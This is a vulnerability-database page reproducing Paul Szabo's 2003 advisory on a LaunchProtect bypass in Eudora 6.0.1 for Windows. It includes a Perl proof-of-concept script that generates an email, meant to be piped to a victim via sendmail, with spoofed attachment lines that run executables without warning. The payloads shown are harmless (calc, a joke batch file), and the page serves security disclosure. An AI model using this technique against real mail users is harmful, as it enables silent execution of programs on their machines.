Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

launchprotect.pl

🗓️ 03 Dec 2003 00:00:00Reported by Paul SzaboType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Eudora 6.0.1's LaunchProtect fails to prevent spoofed executable attachments from running without warning.

Code
`Eudora 6.0.1 (on Windows) has LaunchProtect, to warn the user before  
running executable attachments. However this only works in the attach  
folder; using spoofed attachments, executables stored elsewhere may run  
without warning. In some setups, even executables in the attach folder  
may run without warning.  
  
Harmless demo below.  
  
Cheers,  
  
Paul Szabo - [email protected] http://www.maths.usyd.edu.au:8000/u/psz/  
School of Mathematics and Statistics University of Sydney 2006 Australia  
  
  
---  
  
#!/usr/bin/perl --  
  
use MIME::Base64;  
  
print "From: me\n";  
print "To: you\n";  
print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n";  
print "\n";  
  
print "Pipe the output of this script into: sendmail -i victim\n";  
  
print "  
Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach  
directory only, and allows spoofed attachments pointing to an executable  
stored elsewhere to run without warning:\n";  
print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n";  
print "Attachment Converted\r: c:/winnt/system32/calc\n";  
  
$X = 'README'; $Y = "$X.bat";  
print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";  
$z = "rem Funny joke\r\npause\r\n";  
print "begin 600 $X\n", pack('u',$z), "`\nend\n";  
print "\nand (in another message or) after some blurb so is scrolled off in  
another screenful, also send $Y. Clicking on $X does not  
get it any more (but gets $Y, with a LauchProtect warning):\n";  
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";  
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";  
  
print "  
Can be exploited if there is more than one way into attach: in my setup  
H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n";  
print "These elicit warnings:\n";  
print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme</a>\n";  
print "Attachment Converted\r: h:/eudora/attach/README\n";  
print "while these do the bad thing without warning:\n";  
print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n";  
print "Attachment Converted\r: //rome/home/eudora/attach/README\n";  
print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n";  
  
print "  
For the default setup, Eudora knows that C:\\Program Files  
and C:\\Progra~1 are the same thing...\n";  
print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n";  
print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n";  
  
print "\n";  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Dec 2003 00:00Current
7.4High risk
Vulners AI Score7.4
eudora versionlaunchprotect featureexecutable attachmentssecurity warningspoofed attachments.
24